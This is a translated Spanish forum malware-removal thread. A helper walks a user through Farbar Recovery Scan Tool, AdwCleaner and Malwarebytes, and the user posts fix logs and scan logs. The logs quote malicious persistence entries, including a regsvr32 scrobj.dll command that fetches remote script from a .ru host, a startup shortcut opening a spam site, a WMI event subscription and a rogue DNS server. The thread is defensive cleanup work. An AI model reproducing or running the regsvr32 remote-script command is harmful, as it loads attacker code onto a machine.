Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
C:\Program Files\CCleaner
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Ningún archivo
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Save it under the name fixlist.txt on the desktop <<< This is very important. <<<

Note: It is important that the Frst.exe tool and fixlist.txt are in the same location (the desktop), otherwise it will not work.

  • Now BOOT INTO WINDOWS SAFE MODE.

  • Run Frst.exe.

  • Press the Corregir (Fix) button and wait for it to finish.

  • The tool will save the report on your desktop (Fixlog.txt).

Paste it in your next reply, and also do the following:

1) Download, install and run Malwarebytes' Anti-Malware.

  • Click “Use Malwarebytes Free”.

  • Click the “Open Malwarebytes Free” button.

  • Press the “Scan” button.

Once the scan has finished, the following screen will appear:

[image]

  • Click “View report”.

  • Then press the “Export” button. Choose “Text file”. Choose a name and save that file on the desktop…

2) Download AdwCleaner to the desktop.

  • Disable your antivirus (see: How to temporarily disable an antivirus and any security program).

  • Run Adwcleaner.exe (if you use Windows Vista/7 or 8, right-click and select "Run as administrator").

  • Click the Analizar Ahora (Scan Now) button and wait for the process to complete, then immediately click the Iniciar Reparacion (Start Repair) button.

  • Wait for it to complete and follow the instructions; if it asks you to restart the system, accept.

  • If it finds nothing, click “Omitir Reparación” (Skip Repair).

  • The log can be found in the “Informes” (Reports) tab, reopening the program if necessary, or in "C:\AdwCleaner\Logs\AdwCleaner[C0].txt".

You can consult its manual >> AdwCleaner manual.

  Resultados de la corrección de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (25-04-2020 08:16:14) Run:1
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Modo de Inicio: Safe Mode (minimal)

==============================================

fixlist contenido:
*****************

Start
CreateRestorePoint:
CloseProcesses:

ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
C:\Program Files\CCleaner
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Ningún archivo
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
*****************

Error: El punto de restauración solamente puede ser creado en modo normal.
Procesos cerrados correctamente.
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/ => Error: Ninguna corrección automática encontrada para esta entrada.
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3ce42c48-38d5-11e8-849d-78acc0bd591b} => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Software\Microsoft\Windows\CurrentVersion\Run\\COM+" => eliminado correctamente
C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk => movido correctamente
"C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe" => no encontrado
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA}" => eliminado correctamente
C:\Windows\System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{568A21DE-A13A-462D-94F2-3A85694880BF}" => eliminado correctamente
C:\Windows\Tasks\CCleaner Update.job => movido correctamente
"C:\Program Files\CCleaner" => no encontrado
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => eliminado correctamente
HKLM\System\CurrentControlSet\Services\fiddrv => eliminado correctamente
fiddrv => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\VGPU => eliminado correctamente
VGPU => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\XDva511 => eliminado correctamente
XDva511 => servicio eliminado correctamente
C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E} => movido correctamente
"CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"" => eliminado correctamente
"BVTFilter" => eliminado correctamente
"BVTConsumer" => eliminado correctamente
C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk => Acceso directo argumento eliminado correctamente
C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente


========= Final de RemoveProxy: =========


========= netsh winsock reset =========


El catálogo Winsock se restableció correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= Final de CMD: =========


========= ipconfig /renew =========


Configuración IP de Windows


========= Final de CMD: =========


========= ipconfig /flushdns =========


Configuración IP de Windows

No se puede vaciar la caché de resolución de DNS: Error de una función durante la ejecución.


========= Final de CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to connect to BITS - 0x8007042c
No se puede iniciar el servicio o grupo de dependencia.



========= Final de CMD: =========


========= netsh advfirewall reset =========


Error al intentar ponerse en contacto con el servicio Firewall de Windows. Asegúrese de que el servicio se está ejecutando e intente la solicitud de nuevo.


========= Final de CMD: =========


========= netsh advfirewall set allprofiles state ON =========


Error al intentar ponerse en contacto con el servicio Firewall de Windows. Asegúrese de que el servicio se está ejecutando e intente la solicitud de nuevo.


========= Final de CMD: =========


========= netsh int ipv4 reset =========

No hay valores configurados por el usuario para restablecer.


========= Final de CMD: =========


========= netsh int ipv6 reset =========

No hay valores configurados por el usuario para restablecer.


========= Final de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 16438499 B
Java, Flash, Steam htmlcache => 11125976 B
Windows/system/drivers => 35290840 B
Edge => 0 B
Chrome => 461424075 B
Firefox => 5331236 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66356 B
LocalService => 132584 B
NetworkService => 282430 B
Familia Landaeta => 960903152 B

RecycleBin => 6032034105 B
EmptyTemp: => 7 GB datos temporales Eliminados.

================================


El sistema necesita reiniciarse.

==== Final  Fixlog 08:17:26 ====

everything went fine up to the step of installing Malwarebytes: it starts installing, runs for a couple of minutes, and then the installer closes

Good… now download to your desktop: Windows Repair All in One. Use the portable version; it is usually the last one of all, where you see it says: [screenshot]

It is a ZIP file with this name: tweaking.com_windows_repair_aio.zip. Unzip it and run it from the folder that will have been created on your desktop.

Double-click the file Repair_Windows.exe. (If you use Windows Vista/7/8 or 10, right-click and select Run as administrator.)

On the first screen, accept the license by clicking I Agree; you will then see the program's initial screen, where you must follow these steps:

1. Repairs - Main.

2. Open Repairs.

A new window will appear immediately, where you must continue by clicking:

3. Start Repairs.

The process will carry out all the established steps, and when it finishes, YOU restart the computer.

Try installing Malwarebytes again.

Regards.

I'm still having problems with Malwarebytes

Run the Malwarebytes uninstall tool, restart the PC, and try installing it again.

The error persists. Do you recommend I run AdwCleaner?

Run AdwCleaner and also this other one.

Post both logs for me.

AdwCleaner gave me two logs.

# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build:    04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    04-27-2020
# Duration: 00:00:01
# OS:       Windows 7 Ultimate
# Cleaned:  2
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}|DhcpNameServer - "37.120.145.234"
Deleted       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters|DhcpNameServer - "37.120.145.234"

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [1667 octets] - [27/04/2020 12:01:30]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build:    04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start:    04-27-2020
# Duration: 00:00:37
# OS:       Windows 7 Ultimate
# Scanned:  31802
# Detected: 2


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

PUP.Optional.DNSChanger         HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}|DhcpNameServer - "37.120.145.234"
PUP.Optional.DNSChanger         HKLM\System\CurrentControlSet\Services\Tcpip\Parameters|DhcpNameServer - "37.120.145.234"

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

and here are the ones from Malwarebytes Anti-Rootkit

Malwarebytes Anti-Rootkit BETA 1.10.3.1001
www.malwarebytes.org

Database version:
  main:    v2020.04.27.04
  rootkit: v2020.04.27.04

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 11.0.9600.19129
Familia Landaeta :: FAMILIALANDAETA [administrator]

27/04/2020 11:03:47
mbar-log-2020-04-27 (11-03-47).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 154687
Time elapsed: 24 minute(s), 57 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 3
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 keystone-prod.elasticbeanstalk.com) Good: () -> Replace on reboot. [def2d8e41eb8989e44199bf0cf358c74]
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 keystone.mwbsys.com) Good: () -> Replace on reboot. [c90705b7b12536002b33870407fd11ef]
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 serius.mwbsys.com) Good: () -> Replace on reboot. [e4ec5864b026c96db9a6b8d3c93b25db]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.10.3.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 6.1.7601 Windows 7 Service Pack 1 x86

Account is Administrative

Internet Explorer version: 11.0.9600.19129

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 3.200000 GHz
Memory total: 2111037440, free: 882274304

Downloaded database version: v2020.04.27.04
Downloaded database version: v2020.04.27.04
Downloaded database version: v2018.01.20.01
=======================================
Initializing...
Driver version: 4.3.0.15
------------ Kernel report ------------
     04/27/2020 11:03:22
------------ Loaded modules -----------
----------- End -----------
Done!

Scan started
Database versions:
  main:    v2020.04.27.04
  rootkit: v2020.04.27.04

<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff85e5b160, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85e5ccc8, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffffff85e5b160, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff85d84918, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff85d82030, DeviceName: \Device\Ide\IdeDeviceP2T0L0-2\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: F362F362

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 204800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 206848  Numsec = 312371200
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 160041885696 bytes
Sector size: 512 bytes

Done!
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Scan finished
Creating System Restore point...
Cleaning up...
Removal successful. No system shutdown is required.
=======================================


Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removal finished